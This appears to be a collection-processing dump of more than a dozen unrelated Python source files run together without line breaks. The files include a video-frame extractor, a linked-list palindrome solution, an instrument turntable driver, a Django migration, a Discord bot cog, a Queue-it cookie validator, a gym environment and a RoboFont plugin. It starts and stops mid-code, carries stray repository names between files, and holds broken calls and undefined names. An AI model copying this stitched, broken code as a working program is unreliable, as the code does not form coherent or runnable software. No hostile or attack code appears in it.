Video2Pic(videopath): videoPath = img_root + '/' + videopath # 读取视频路径 folder_name = 'output' # 定义新建文件夹名 if os.path.isdir(img_root): os.mkdir(os.path.join(img_root, folder_name)) # 新建文件 imgPath = img_root + "/output/" # 保存图片路径 cap = cv2.VideoCapture(videoPath) fps = cap.get(cv2.CAP_PROP_FPS) # 获取帧率 width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)) # 获取宽度 height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) # 获取高度 if not cap.isOpened(): # 是否成功打开 print("Please check the path.") frame_interval =9 frame_count = 0 cnt = 0 while 1: suc, frame = cap.read() cnt += 1 frame_count += 1 if not suc: break cv2.imwrite(imgPath + "%02d.png" % frame_count, frame) cv2.waitKey(1) print("视频转图片成功") cap.release() if __name__ == '__main__': a = QR_code() Video2Pic() from typing import Callable, Optional class ListNode: def __init__(self, val: int) -> None: self.val = val self.next: Optional[ListNode] = None def __repr__(self) -> str: return f'ListNode({self.val})' def create_node_list(values: list[int]) -> ListNode: """Creates a ListNode out of a list of values""" head = ListNode(values[0]) last_node = head for value in values[1:]: node = ListNode(value) last_node.next = node last_node = node return head class Solution: def isPalindrome(self, head: Optional[ListNode]) -> bool: slow = fast = head prev: Optional[ListNode] = None while fast is not None and fast.next is not None: fast = fast.next.next # Since fast is always ahead of slow, # slow.next is always < fast.next. So we can assume these two. assert slow is not None assert slow.next is not None # Same as doing: # old_prev = prev # prev = slow # slow = slow.next # prev.next = old_prev # All this is doing is forwarding both prev and slow 1 step, # While also reversing the list behind prev. prev, prev.next, slow = slow, prev, slow.next # For odd number of elements, prev will be 1 element behind the # middle element, while slow will be on the middle element. # So we want slow to move 1 element ahead, as middle element # is the same for both. if fast is not None: assert slow is not None slow = slow.next # Now, we have divided our list into two linked lists, # One, moving forwards from slow, # Two, moving backwards from prev. # All we need to do is confirm both have the same elements. while prev is not None: assert slow is not None if prev.val != slow.val: return False slow = slow.next prev = prev.next # Making sure the lengths of the two weren't mismatched. return prev is None tests = [ ( ([1],), True, ), ( ([1, 2],), False, ), ( ([1, 2, 2, 1],), True, ), ( ([1, 2, 3, 4, 5],), False, ), ( ([1, 2, 3, 2, 1],), True, ), ( ([1, 2, 3, 2, 1, 1],), False, ), ] def validator( isPalindrome: Callable[[ListNode], bool], inputs: tuple[list[int]], expected: bool ) -> None: values, = inputs node_list = create_node_list(values) output = isPalindrome(node_list) assert output == expected, (output, expected) Ashkan-Agc/Moris-mano-cpu-assembler import struct from file_opr import write_file def compiler(object_dict, output_path, mode): header_list = list(object_dict.keys()) #sort dic keys header_list.sort() for memory_location in header_list: integer = int(object_dict[memory_location], 16) # update values to bin object_dict[memory_location] = struct.pack('>i', integer) write_file(output_path, header_list, object_dict, mode)Source_Code/Python/labinstrument/turntable/ETS2090/ETS2090.py from ...remote import * from ...interface import * import time class ETS2090(IConfigurable): ''' This instrment include 2 rotations, one is theta, the other is phi, so this init message should contain 2 gpib port ''' def __init__(self, theta_string, phi_string): self.theta = simpleETS2090(theta_string) self.phi = simpleETS2090(phi_string) def set_parameters(self, parameter: dict): self.theta.set_parameters(parameter['theta']) self.phi.set_parameters(parameter['phi']) def get_parameters(self) -> dict: return { "theta": self.theta.get_parameters(), "phi": self.phi.get_parameters() } class simpleETS2090(GPIB, IConfigurable): def __init__(self, *args, **kwargs): super(simpleETS2090, self).__init__(*args, **kwargs) def __set_lower_limit(self,value): self.write("CL {}".format(value)) def __set_upper_limit(self,value): self.write("WL {}".format(value)) def __get_lower_limit(self): return self.query("CL?") def __get_upper_limit(self): return self.query("WL?") def __get_speed(self): return self.query("S?") def __set_speed(self,value): self.write('S{}'.format(value)) def __set_mode(self,value): self.write('N{}'.format(value) if type(value) is int else value) def __get_mode(self): return self.query('LV?') def __set_current_position(self,value): self.write("CP {}".format(value)) def __get_current_position(self): return self.query('CP?') def __set_scan_count(self,value): self.write("CY {}".format(value)) def __get_scan_count(self): return self.query("WL?") def seek(self,value,timeout=200): #second self.write('SK {}'.format(value)) return self.wait_until_done(timeout) def seek_async(self,value,timeout=200): self.write('SK {}'.format(value)) def done(self): return self.OPC() def wait_until_done(self,timeout=200): time_start_stamp=float(datetime.datetime.now().timestamp()) while 1: if float(datetime.datetime.now().timestamp())-time_start_stamp>timeout: return 0 else: if self.OPC()=="1": return 1 else: time.sleep(0.1) def scan(self): self.write('SC') def is_scanning(self): self.query("SC?") def stop_scan(self): # !!! we should know how to stop the scanning pass def set_preset_speed(self,speed_index,speed): self.write("SS{} {}".format(speed_index,speed)) def get_preset_speed(self,speed_index): return self.query("SS{}?".format(speed_index)) def select_turntable_mode(self,instrument_type1,instrument_type2): # TT # NRM Normal turntable # AIR Air flotation turntable # TWO Two speed turntable # CONT continuous rotation turntable # NOCONT Non continuous rotation turntable self.write("TT {} {}".format(instrument_type1,instrument_type2)) def select_tower_mode(self,instrument_type1): # NRM Normal turntable # BOR Bore sight tower self.write("TWR {}".format(instrument_type1)) mode=property(__get_mode,__set_mode) speed=property(__get_speed,__set_speed) current_position = property(__get_current_position, __set_current_position) lower_limit = property(__get_lower_limit, __set_lower_limit) upper_limit = property(__get_upper_limit, __set_upper_limit) def set_parameters(self, parameter: dict): if "mode" in parameter: self.mode=parameter['mode'] if "speed" in parameter: self.speed=parameter['speed'] if "lower limit" in parameter: self.lower_limit=parameter['lower limit'] if "upper limit" in parameter: self.upper_limit=parameter['upper limit'] def get_parameters(self) -> dict: return { 'mode':self.mode, 'speed':self.speed, 'lower limit':self.lower_limit, 'upper limit':self.upper_limit, } if __name__ == '__main__': # init instrument # query idn # config status reporting # set numeric mode2 # verify current position # set sw limit as needed # set scan count, polarization, and any other desired motion related parameters # send gpib command for desired motion # wait for motion to complete # monitor current position as required # check for operation complete # repeat until motion complete # stop all devices pass 1-10 from Calculator.Calculator import Calculator from AdditionalModules.RandomNumberGenerator.One import one from AdditionalModules.RandomNumberGenerator.Two import two from AdditionalModules.RandomNumberGenerator.Three import three from AdditionalModules.RandomNumberGenerator.Four import four from AdditionalModules.RandomNumberGenerator.Five import five from AdditionalModules.RandomNumberGenerator.Six import six from AdditionalModules.RandomNumberGenerator.Seven import seven class RandomNumberGenerator(Calculator): # Generate a random number without a seed between a range of two numbers - Both Integer and Decimal def one(self, low, high): self.result = one(low, high) return self.result # Generate a random number with a seed between a range of two numbers - Both Integer and Decimal def two(self, low, high, seed_value): self.result = two(low, high, seed_value) return self.result # Generate a list of N random numbers with a seed and between a range of numbers - Both Integer and Decimal def three(self, length, seed_value): self.result = three(length, seed_value) return self.result # Select a random item from a list def four(self, data): self.result = four(data) return self.result # Set a seed and randomly select the same value from a list def five(self, data, seed_value): self.result = five(data, seed_value) return self.result # Select N number of items from a list without a seed def six(self, data, n): self.result = six(data, n) return self.result # Select N number of items from a list with a seed def seven(self, data, n, seed_value): self.result = seven(data, n, seed_value) return self.resultfrom MDSplus import Device,Data,TreeNode _device_list = None def _devHelpDevtype(devtype, full): from pydoc import TextDoc global _device_list if _device_list is None: alldevices=Data.execute('MDSDEVICES()') _device_list=[item[0].strip() for item in alldevices] if ('*' in devtype) or ('?' in devtype): devnames=[] for device in _device_list: if (Data.execute('MdsShr->StrMatchWild(descr($),descr($))',(device.upper(),devtype.upper())) & 1) == 1: devnames.append(DevHelp(device,-1)) return '\n'.join(devnames) else: try: cls = Device.PyDevice(devtype) if full == 1: return TextDoc().docclass(cls) elif full == -1: return "%s: python device" % devtype else: return cls.__doc__ except: for device in _device_list: if device.upper() == devtype.upper(): return "%s: tdi, java or shared library device" % device return "Error obtaining help on device " + devtype def _devHelpNode(node,full): try: elt = int(node.conglomerate_elt) if elt == 0: return "" if elt == 1: return DevHelp(node.record.model,full) else: cls = node.head.record.getDevice() return cls.parts[elt-2].get('help',"") except Exception as e: return "ERROR: %s"%(str(e),) def DevHelp(dev,full=0): if isinstance(dev,TreeNode): return _devHelpNode(dev,int(full)) else: return _devHelpDevtype(str(dev),int(full)) PKopel/IOT-Smartband from fastapi import FastAPI from pydantic import BaseModel import main # import logging app = FastAPI() # logging.basicConfig(level=logging.DEBUG) @app.get("/") async def read_root(): return {"Hello": "World"} @app.get("/all") async def test(): return main.open_csv() @app.get("/single_user_single_day/raw/{date}/{user}") async def single_user_single_day_raw(date, user): return main.single_user_single_day_raw(date, user) @app.get("/single_user_single_day/{date}/{user}") async def single_user_single_day(date, user): return main.single_user_single_day(date, user) @app.get("/all_users_by_day") async def all_users_by_day(): return main.all_users_by_day() @app.get("/all_users_for_day/{day}") async def all_users_for_day(day): return main.all_users_for_day(day) @app.get("/all_days_by_user") async def all_days_by_user(): return main.all_days_by_user() @app.get("/all_days_for_user/{user}") async def all_days_for_user(user): return main.all_days_for_user(user) DeNA/ChainerPruner10-100 # Copyright (c) 2018 DeNA Co., Ltd. # Licensed under The MIT License [see LICENSE for details] import logging from chainerpruner.rebuild.calc_pruning_connection import calc_pruning_connection import chainerpruner from chainerpruner.rebuild.mapping import get_mapping logger = logging.getLogger(__name__) __passive_pruned = set() def passive_pruned_add(node): global __passive_pruned __passive_pruned.add(node) def passive_pruned_clear(): global __passive_pruned __passive_pruned.clear() def rebuild(model, graph, target_layers, mapping=None): """rebuild each weight Args: model: graph: target_layers: mapping: Returns: """ passive_pruned_clear() if not mapping: mapping = get_mapping(model) if len(target_layers) == 0: raise ValueError('invalid rebuild_info') pruning_connection_info = calc_pruning_connection(graph) if not pruning_connection_info: raise ValueError('pruinng_connection_info parse error') logger.debug('pruning_connection_info', pruning_connection_info) model_dict = {name: link for name, link in chainerpruner.utils.named_modules(model)} info = [] nodes = {node.name: node for node in graph.graph.nodes} pruned = set() count = 0 for name, post_names in pruning_connection_info.items(): if name not in target_layers: continue logger.debug('(active)%s: %s', name, post_names) # rebuild pruning target node target_link = model_dict[name] rebuild_link_class = mapping.get(type(target_link), None) # type: chainerpruner.rebuild.RebuildLink if rebuild_link_class is None: raise NotImplementedError('RebuildLink is not implemented.' 'This layer can not be pruning.' '{}: {}'.format(name, target_link)) rebuild_link = rebuild_link_class() rebuild_link.node = nodes[name] mask = rebuild_link.apply_active_rebuild(target_link) info.append({ 'name': name, 'before': len(mask), 'after': int(sum(mask)), }) # later node rebuild (input channels) for post_name in post_names: logger.debug('(passive)%s:', post_name) if post_name in pruned: continue target_link = model_dict[post_name] # passive rebuild済のノードはskipする # 例えばSEBlock(Linear, Linear)のようにUserDefinedChainのまとまりとして # in/outチャネルの整合性を保つ必要がある層がある # この場合、SEBlockのpassive rebuildのクラスをテーブルに追加しておき、 # SEBlockを構成するLinearのpassive rebuildはskipするようにする if target_link in __passive_pruned: continue rebuild_link_class = mapping.get(type(target_link), None) if rebuild_link_class is None: # ResBlockなどUserDefinedLinkを含む場合があるのでskip continue rebuild_link = rebuild_link_class() rebuild_link.node = nodes[post_name] rebuild_link.apply_passive_rebuild(target_link, mask) pruned.add(post_name) count += 1 if count == 0: logger.warning('rebuild layer not found') passive_pruned_clear() return info # Generated by Django 3.2.2 on 2021-06-01 06:34 import ckeditor_uploader.fields from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name="Tags", fields=[ ( "id", models.BigAutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("tag", models.CharField(max_length=220)), ], ), migrations.CreateModel( name="Post", fields=[ ( "id", models.BigAutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("title", models.CharField(max_length=256)), ("description", models.CharField(max_length=300)), ("text", ckeditor_uploader.fields.RichTextUploadingField()), ("created_on", models.DateTimeField(auto_now_add=True)), ( "slug", models.SlugField( blank=True, max_length=200, null=True, unique=True ), ), ("tags", models.ManyToManyField(to="forum.Tags")), ( "user", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="posts", to=settings.AUTH_USER_MODEL, ), ), ], options={ "ordering": ["-created_on"], }, ), migrations.CreateModel( name="Comment", fields=[ ( "id", models.BigAutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("text", ckeditor_uploader.fields.RichTextUploadingField()), ("created_on", models.DateTimeField(auto_now_add=True)), ( "post", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="comments", to="forum.post", ), ), ( "user", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="comments", to=settings.AUTH_USER_MODEL, ), ), ], options={ "ordering": ["-created_on"], }, ), ] import random import discord import discord.ext.commands as commands def setup(bot): bot.add_cog(Music(bot)) class RandomAudio(discord.AudioSource): def read(self): print('read') return random.getrandbits(30720) | 0b11111111 class Music: def __init__(self, bot): self.bot = bot @commands.command() async def summon(self, ctx, *, channel: discord.VoiceChannel = None): if channel is None and not ctx.author.voice: raise commands.CommandError('You are not in a voice channel.') channel = channel or ctx.author.voice.channel if not ctx.voice_client: await channel.connect() else: await ctx.voice_client.move_to(channel) @commands.command() async def leave(self, ctx): await ctx.voice_client.disconnect() @commands.command() async def play(self, ctx, song): ctx.voice_client.play(discord.PCMAudio(f'music/{song}')) await ctx.send(ctx.voice_client.is_playing()) @commands.command() async def is_playing(self, ctx): await ctx.send(ctx.voice_client.is_playing())0 import codecs import csv import json from operator import itemgetter PROPS = ['num_fosas', 'num_cuerpos'] def analyze_national_per_year(): per_year = {year: {"year": year, "num_fosas": 0, "num_fosas_change": 0, "num_cuerpos": 0, "num_cuerpos_change": 0} for year in range(2006, 2017)} with codecs.open('data/processed-geojson/municipales-centroids.json', encoding='utf-8') as f: data = json.load(f) for feature in data['features']: properties = feature['properties'] for year in range(2006, 2017): for prop in PROPS: per_year[year][prop] += properties[prop + '_' + str(year)] for year in range(2007, 2017): for prop in PROPS: per_year[year][prop + '_change'] = (per_year[year][prop] - per_year[year - 1][prop]) / float(per_year[year - 1][prop]) * 100 with open('data/analysis/national-per-year.csv', 'w') as f: writer = csv.DictWriter(f, fieldnames=['year', 'num_fosas', 'num_fosas_change', 'num_cuerpos', 'num_cuerpos_change']) writer.writeheader() writer.writerows(per_year.values()) def analyze_per_municipality(): with codecs.open('src/data/mxstates.json', encoding='utf-8') as f: states = json.load(f) state_lookup = {row['state_code']: row for row in states} municipalities = [] with codecs.open('data/processed-geojson/municipales-centroids.json', encoding='utf-8') as f: data = json.load(f) for feature in data['features']: properties = feature['properties'] row = { 'state_code': properties['CVE_ENT'], 'state_name': state_lookup[properties['CVE_ENT']]['state_name'], 'municipality_code': properties['CVE_MUN'], 'municipality_name': properties['NOM_MUN'], } for prop in PROPS: total = 0 for year in range(2006, 2017): total += properties[prop + '_' + str(year)] row[prop + '_total'] = total municipalities.append(row) municipalities = sorted(municipalities, key=itemgetter('num_fosas_total'), reverse=True) with open('data/analysis/municipalities-counts.csv', 'w') as f: writer = csv.DictWriter(f, fieldnames=['state_code', 'state_name', 'municipality_code', 'municipality_name', 'num_fosas_total', 'num_cuerpos_total']) writer.writeheader() writer.writerows(municipalities) if __name__ == '__main__': analyze_national_per_year() analyze_per_municipality() # -*- coding: utf-7 -*- """An example setup.py""" try: from setuptools import setup except ImportError: from distutils.core import setup CONFIG = { 'description': 'My Toy Python Project', 'author': '', 'url': 'https://github.com/bheavner/python_toy', 'download_url': 'https://github.com/bheavner/python_toy', 'author_email': '', 'version': '0.1.0.dev1', 'install_requires': [], 'packages': ['toy'], 'scripts': [], 'name': 'python_toy' } setup(**CONFIG) from .queueit_helpers import QueueitHelpers from .models import Utils class UserInQueueStateCookieRepository: QUEUEIT_DATA_KEY = "QueueITAccepted-SDFrts345E-V3" def __init__(self, httpContextProvider): self.httpContextProvider = httpContextProvider @staticmethod def getCookieKey(eventId): return UserInQueueStateCookieRepository.QUEUEIT_DATA_KEY + '_' + eventId @staticmethod def __generateHash(eventId, queueId, fixedCookieValidityMinutes, redirectType, issueTime, secretKey): return QueueitHelpers.hmacSha256Encode( eventId + queueId + fixedCookieValidityMinutes + redirectType + issueTime, secretKey) @staticmethod def __createCookieValue(eventId, queueId, fixedCookieValidityMinutes, redirectType, secretKey): issueTime = Utils.toString( QueueitHelpers.getCurrentTime()) hashValue = UserInQueueStateCookieRepository.__generateHash( eventId, queueId, fixedCookieValidityMinutes, redirectType, issueTime, secretKey) fixedCookieValidityMinutesPart = "" if (not Utils.isNilOrEmpty(fixedCookieValidityMinutes)): fixedCookieValidityMinutesPart = "&FixedValidityMins=" + fixedCookieValidityMinutes cookieValue = "EventId=" + eventId + "&QueueId=" + queueId + fixedCookieValidityMinutesPart + "&RedirectType=" + redirectType + "&IssueTime=" + issueTime + "&Hash=" + hashValue return cookieValue @staticmethod def __getCookieNameValueMap(cookieValue): result = {} cookieNameValues = cookieValue.split("&") for item in cookieNameValues: arr = item.split("=") if (len(arr) == 2): result[arr[0]] = arr[1] return result @staticmethod def __isCookieValid(secretKey, cookieNameValueMap, eventId, cookieValidityMinutes, validateTime): try: if ("EventId" not in cookieNameValueMap): return False if ("QueueId" not in cookieNameValueMap): return False if ("RedirectType" not in cookieNameValueMap): return False if ("IssueTime" not in cookieNameValueMap): return False if ("Hash" not in cookieNameValueMap): return False fixedCookieValidityMinutes = "" if ("FixedValidityMins" in cookieNameValueMap): fixedCookieValidityMinutes = cookieNameValueMap[ "FixedValidityMins"] hashValue = UserInQueueStateCookieRepository.__generateHash( cookieNameValueMap["EventId"], cookieNameValueMap["QueueId"], fixedCookieValidityMinutes, cookieNameValueMap["RedirectType"], cookieNameValueMap["IssueTime"], secretKey) if (hashValue != cookieNameValueMap["Hash"]): return False if (eventId.upper() != cookieNameValueMap["EventId"].upper()): return False if (validateTime): validity = cookieValidityMinutes if (not Utils.isNilOrEmpty(fixedCookieValidityMinutes)): validity = int(fixedCookieValidityMinutes) expirationTime = int( cookieNameValueMap["IssueTime"]) + (validity * 60) if (expirationTime < QueueitHelpers.getCurrentTime()): return False return True except: return False def store(self, eventId, queueId, fixedCookieValidityMinutes, cookieDomain, redirectType, secretKey): cookieKey = UserInQueueStateCookieRepository.getCookieKey(eventId) cookieValue = UserInQueueStateCookieRepository.__createCookieValue( eventId, queueId, Utils.toString(fixedCookieValidityMinutes), redirectType, secretKey) self.httpContextProvider.setCookie( cookieKey, cookieValue, QueueitHelpers.getCookieExpirationDate(), cookieDomain) def getState(self, eventId, cookieValidityMinutes, secretKey, validateTime): try: cookieKey = UserInQueueStateCookieRepository.getCookieKey(eventId) if (self.httpContextProvider.getCookie(cookieKey) is None): return StateInfo(False, False, None, None, None) cookieNameValueMap = UserInQueueStateCookieRepository.__getCookieNameValueMap( self.httpContextProvider.getCookie(cookieKey)) if (not UserInQueueStateCookieRepository.__isCookieValid( secretKey, cookieNameValueMap, eventId, cookieValidityMinutes, validateTime)): return StateInfo(True, False, None, None, None) fixedCookieValidityMinutes = None if ("FixedValidityMins" in cookieNameValueMap): fixedCookieValidityMinutes = int( cookieNameValueMap["FixedValidityMins"]) return StateInfo(True, True, cookieNameValueMap["QueueId"], fixedCookieValidityMinutes, cookieNameValueMap["RedirectType"]) except: return StateInfo(True, False, None, None, None) def cancelQueueCookie(self, eventId, cookieDomain): cookieKey = UserInQueueStateCookieRepository.getCookieKey(eventId) self.httpContextProvider.setCookie(cookieKey, None, -1, cookieDomain) def reissueQueueCookie(self, eventId, cookieValidityMinutes, cookieDomain, secretKey): cookieKey = UserInQueueStateCookieRepository.getCookieKey(eventId) cookieValue = self.httpContextProvider.getCookie(cookieKey) if (cookieValue == None): return cookieNameValueMap = UserInQueueStateCookieRepository.__getCookieNameValueMap( cookieValue) if (not UserInQueueStateCookieRepository.__isCookieValid( secretKey, cookieNameValueMap, eventId, cookieValidityMinutes, True)): return fixedCookieValidityMinutes = "" if ("FixedValidityMins" in cookieNameValueMap): fixedCookieValidityMinutes = cookieNameValueMap[ "FixedValidityMins"] cookieValue = UserInQueueStateCookieRepository.__createCookieValue( eventId, cookieNameValueMap["QueueId"], fixedCookieValidityMinutes, cookieNameValueMap["RedirectType"], secretKey) self.httpContextProvider.setCookie( cookieKey, cookieValue, QueueitHelpers.getCookieExpirationDate(), cookieDomain) class StateInfo: def __init__(self, isFound, isValid, queueId, fixedCookieValidityMinutes, redirectType): self.isFound = isFound self.isValid = isValid self.queueId = queueId self.fixedCookieValidityMinutes = fixedCookieValidityMinutes self.redirectType = redirectType def isStateExtendable(self): return self.isValid and Utils.isNilOrEmpty( self.fixedCookieValidityMinutes) import gym from gym import spaces, logger from gym.utils import seeding import numpy as np from action_space import ActionSpace from state_space import StateSpace from gym.spaces import Discrete from ST import SecondTransmitor class BackscatterEnv3(gym.Env): TIME_FRAME = 10 BUSY_TIMESLOT = 4 DATA_RATE = 0.3 def __init__(self): # System parameters self.nb_ST = 3 self.state_size = 2 * self.nb_ST self.nb_actions = (BackscatterEnv3.BUSY_TIMESLOT+1) ** 3 * (BackscatterEnv3.TIME_FRAME - BackscatterEnv3.BUSY_TIMESLOT+1)**2 self.action_space = ActionSpace((Discrete(BackscatterEnv3.BUSY_TIMESLOT+1), Discrete(BackscatterEnv3.BUSY_TIMESLOT+1), Discrete(BackscatterEnv3.BUSY_TIMESLOT + 1), Discrete(BackscatterEnv3.TIME_FRAME - BackscatterEnv3.BUSY_TIMESLOT + 1), Discrete(BackscatterEnv3.TIME_FRAME - BackscatterEnv3.BUSY_TIMESLOT+1))) self.observation_space = StateSpace((Discrete(SecondTransmitor.QUEUE), Discrete(SecondTransmitor.ENERGY), Discrete(SecondTransmitor.QUEUE), Discrete(SecondTransmitor.ENERGY), Discrete(SecondTransmitor.QUEUE), Discrete(SecondTransmitor.ENERGY))) # initialize Second Transmitters self.ST1 = SecondTransmitor(data_rate=BackscatterEnv3.DATA_RATE) self.ST2 = SecondTransmitor(data_rate=BackscatterEnv3.DATA_RATE) self.ST3 = SecondTransmitor(data_rate=BackscatterEnv3.DATA_RATE) self.viewer = None self.state = None self.steps_beyond_done = None def seed(self, seed=None): self.np_random, seed = seeding.np_random(seed) return [seed] def step(self, action): assert self.action_space.contains(action), "%r (%s) invalid"%(action, type(action)) harvest = action[0] backscatter_time_1 = action[1] backscatter_time_2 = action[2] transmit_time_1 = action[3] transmit_time_2 = action[4] backscatter_time_3 = BackscatterEnv3.BUSY_TIMESLOT - harvest - backscatter_time_1 - backscatter_time_2 transmit_time_3 = BackscatterEnv3.TIME_FRAME - BackscatterEnv3.BUSY_TIMESLOT - transmit_time_1 - transmit_time_2 reward = 0 if((backscatter_time_3 >= 0) and (transmit_time_3 >= 0)): harvest_time_1 = BackscatterEnv3.BUSY_TIMESLOT - backscatter_time_1 harvest_time_2 = BackscatterEnv3.BUSY_TIMESLOT - backscatter_time_2 harvest_time_3 = BackscatterEnv3.BUSY_TIMESLOT - backscatter_time_3 reward += self.ST1.update(harvest_time_1, backscatter_time_1, transmit_time_1) reward += self.ST2.update(harvest_time_2, backscatter_time_2, transmit_time_2) reward += self.ST3.update(harvest_time_3, backscatter_time_3, transmit_time_3) throughtput = reward datawaiting_before = self.ST1.queue self.ST1.generateData() self.ST2.generateData() self.ST3.generateData() datawaiting = self.ST1.queue state = [self.ST1.queue, self.ST1.energy, self.ST2.queue, self.ST2.energy, self.ST3.queue, self.ST3.energy] self.state = tuple(state) else: # in case, assignment is not suitable reward = -10 throughtput = 0 datawaiting_before = self.ST1.queue if (self.ST1.queue == SecondTransmitor.QUEUE and self.ST2.queue == SecondTransmitor.QUEUE and self.ST3.queue == SecondTransmitor.QUEUE): self.ST1.reset() self.ST2.reset() self.ST3.reset() else: self.ST1.generateData() self.ST2.generateData() self.ST3.generateData() datawaiting = self.ST1.queue state = [self.ST1.queue, self.ST1.energy, self.ST2.queue, self.ST2.energy, self.ST3.queue, self.ST3.energy] self.state = tuple(state) print(np.array(self.state), reward, datawaiting, action) done = False # print(np.array(self.state), reward, done, {}) return np.array(self.state), [reward, throughtput, datawaiting_before, datawaiting], done, {} def reset(self): self.state = [] self.ST1.reset() self.ST2.reset() self.ST3.reset() state = [self.ST1.queue, self.ST1.energy, self.ST2.queue, self.ST2.energy, self.ST3.queue, self.ST3.energy] self.state = tuple(state) print(self.state) self.steps_beyond_done = None return np.array(self.state) def updateObservation(self): return def render(self, mode='human', close=False): return def close(self): """Override in your subclass to perform any necessary cleanup. Environments will automatically close() themselves when garbage collected or when the program exits. """ raise NotImplementedError() def seed(self, seed=None): """Sets the seed for this env's random number generator(s). # Returns Returns the list of seeds used in this env's random number generators """ raise NotImplementedError() def configure(self, *args, **kwargs): """Provides runtime configuration to the environment. This configuration should consist of data that tells your environment how to run (such as an address of a remote server, or path to your ImageNet data). It should not affect the semantics of the environment. """ raise NotImplementedError() # env = BackscatterEnv3() # env.reset() # for index in range(0, 1000): # env.step(env.action_space.sample())0 #coding=utf-8 __version__ = 0.1 import shutil from robofab.world import RFont from defconAppKit.tools.textSplitter import splitText from vanilla import Window, List, Slider, CheckBox, EditText, SquareButton, Group, TextBox, Sheet, Tabs from vanilla.dialogs import getFile from mojo.UI import MultiLineView from mojo.events import addObserver, removeObserver from objects.manager import FiltersManager, makeKey class PenBallWizard(object): def __init__(self): self.filters = FiltersManager() self.glyphNames = [] self.cachedFont = RFont(showUI=False) self.currentFont = CurrentFont() filtersList = self.filters.get() if len(self.filters): self.currentFilterKey = filtersList[0] else: self.currentFilterKey = None self.fill = True self.observers = [ ('fontChanged', 'fontBecameCurrent'), ] self.w = Window((600, 400), 'PenBall Wizard v{0}'.format(__version__), minSize=(500, 400)) self.w.filtersPanel = Group((0, 0, 300, -0)) self.w.filtersPanel.filtersList = List((0, 0, -0, -40), filtersList, selectionCallback=self.filterSelectionChanged, doubleClickCallback=self.filterEdit, allowsMultipleSelection=False, allowsEmptySelection=False, rowHeight=22) self.w.filtersPanel.options = Group((0, -40, -0, 0)) self.w.filtersPanel.addFilter = SquareButton((0, -40, 150, 40), 'Add filter', sizeStyle='small', callback=self.addFilter) self.w.filtersPanel.removeFilter = SquareButton((-150, -40, 150, 40), 'Remove filter', sizeStyle='small', callback=self.removeFilter) self.w.filtersPanel.removeFilter.enable(False) self.w.textInput = EditText((300, 0, -90, 22), '', callback=self.stringInput) self.w.generate = SquareButton((-90, 0, 90, 22), 'Generate', callback=self.generateGlyphs, sizeStyle='small') self.w.preview = MultiLineView((300, 22, -0, -0)) self.w.switchFillStroke = SquareButton((-75, -40, 60, 25), 'Fill', callback=self.switchFillStroke, sizeStyle='small') displayStates = self.w.preview.getDisplayStates() for key in ['Show Metrics','Upside Down','Stroke','Beam','Inverse','Water Fall','Single Line']: displayStates[key] = False for key in ['Fill','Multi Line']: displayStates[key] = True self.w.preview.setDisplayStates(displayStates) for callback, event in self.observers: addObserver(self, callback, event) self.updateOptions() self.w.bind('close', self.end) self.w.open() def generateGlyphs(self, sender): font = self.currentFont newFont = RFont(showUI=False) if font is not None: glyphs = [font[glyphName] for glyphName in font.selection if glyphName in font] key, arguments = self.getFilterTokens() if key is not None: filteredGlyphs = [] for glyph in glyphs: if len(glyph.components) > 0: for comp in glyph.components: baseGlyphName = comp.baseGlyph baseGlyph = font[baseGlyphName] baseFilteredGlyph = baseGlyph.getRepresentation(key, **arguments) newFont.insertGlyph(baseFilteredGlyph, baseGlyphName) filteredGlyph = glyph.getRepresentation(key, **arguments) if filteredGlyph is not None: newFont.insertGlyph(filteredGlyph, glyph.name) newFont.showUI() def getFilterTokens(self): if self.currentFilterKey is not None: key = makeKey(self.currentFilterKey) currentFilter = self.getCurrentFilter() arguments = currentFilter['arguments'] if currentFilter.has_key('arguments') else {} return key, arguments return None, None def updateFiltersList(self): filtersList = self.filters.get() self.w.filtersPanel.filtersList.set(filtersList) def setArgumentValue(self, sender): value = sender.get() valueType = sender.type if valueType == 'bool': value = bool(value) key = sender.name if self.currentFilterKey is not None: self.filters.setFilterArgument(self.currentFilterKey, key, value) self.updatePreview() def processGlyphs(self): font = self.currentFont if font is not None: glyphs = [font[glyphName] for glyphName in self.glyphNames if glyphName in font] key, arguments = self.getFilterTokens() if key is not None: filteredGlyphs = [] for glyph in glyphs: if len(glyph.components) > 0: for comp in glyph.components: baseGlyphName = comp.baseGlyph baseGlyph = font[baseGlyphName] baseFilteredGlyph = baseGlyph.getRepresentation(key, **arguments) self.cachedFont.insertGlyph(baseFilteredGlyph, baseGlyphName) filteredGlyph = glyph.getRepresentation(key, **arguments) if filteredGlyph is not None: self.cachedFont.insertGlyph(filteredGlyph, glyph.name) filteredGlyphs.append(self.cachedFont[glyph.name]) return filteredGlyphs self.cachedFont = self.currentFont return glyphs return [] def updatePreview(self): glyphs = self.processGlyphs() self.w.preview.setFont(self.cachedFont) self.w.preview.set(glyphs) def updateOptions(self): if hasattr(self.w.filtersPanel, 'options'): delattr(self.w.filtersPanel, 'options') if self.currentFilterKey is not None: currentFilter = self.getCurrentFilter() arguments = currentFilter['arguments'] if currentFilter.has_key('arguments') else {} limits = currentFilter['limits'] if currentFilter.has_key('limits') else {} height = (len(arguments) * 40) + 40 self.w.filtersPanel.filtersList.setPosSize((0, 0, -0, -height)) self.w.filtersPanel.options = Group((0, -height, -0, -40)) for i, (arg, value) in enumerate(arguments.items()): attrName = 'option{0}'.format(i) valueType = None if limits.has_key(arg): mini, maxi = limits[arg] else: mini, maxi = 0, 100 if isinstance(value, bool): setattr(self.w.filtersPanel.options, attrName, CheckBox((15, 15 + (i*30), -15, 22), arg, value=value, callback=self.setArgumentValue, sizeStyle='small')) valueType = 'bool' elif isinstance(value, (str, unicode)): setattr(self.w.filtersPanel.options, attrName, EditText((15, 15 + (i*30), -15, 22), value, callback=self.setArgumentValue, sizeStyle='small')) elif isinstance(value, (int, float)): setattr(self.w.filtersPanel.options, attrName+'Title', TextBox((15, 18 + (i*30), 150, 